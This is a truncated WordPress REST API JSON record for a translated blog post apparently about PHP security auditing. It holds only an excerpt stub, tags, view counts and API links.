\u4f5c\u8005\uff1aShahin Ramezany \u8bd1\u8005\uff1ariusksk\uff08\u6cc9\u54e5\uff1aht [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[23,25],"tags":[216,48,37],"class_list":["post-872","post","type-post","status-publish","format-standard","hentry","category-knowledgebase-2","category-security","tag-audit","tag-php","tag-security"],"views":10673,"_links":{"self":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/872","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/comments?post=872"}],"version-history":[{"count":0,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/872\/revisions"}],"wp:attachment":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/media?parent=872"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/categories?post=872"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/tags?post=872"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}